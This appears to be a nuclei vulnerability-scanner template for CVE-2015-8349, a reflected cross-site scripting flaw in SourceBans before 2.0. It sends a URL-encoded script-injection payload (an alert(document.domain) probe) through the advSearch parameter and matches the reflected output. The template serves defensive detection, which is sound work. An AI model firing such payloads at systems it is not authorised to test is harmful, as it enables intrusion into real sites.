nuclei-templates/cves/2015/CVE-2015-8349.yaml

41 lines
1.2 KiB
YAML

id: CVE-2015-8349
info:
name: SourceBans <2.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
reference:
- https://www.htbridge.com/advisory/HTB23273
- http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded
- https://nvd.nist.gov/vuln/detail/CVE-2015-8349
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-8349
cwe-id: CWE-79
tags: cve,cve2015,xss,sourcebans
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/
# Enhanced by mp on 2022/08/12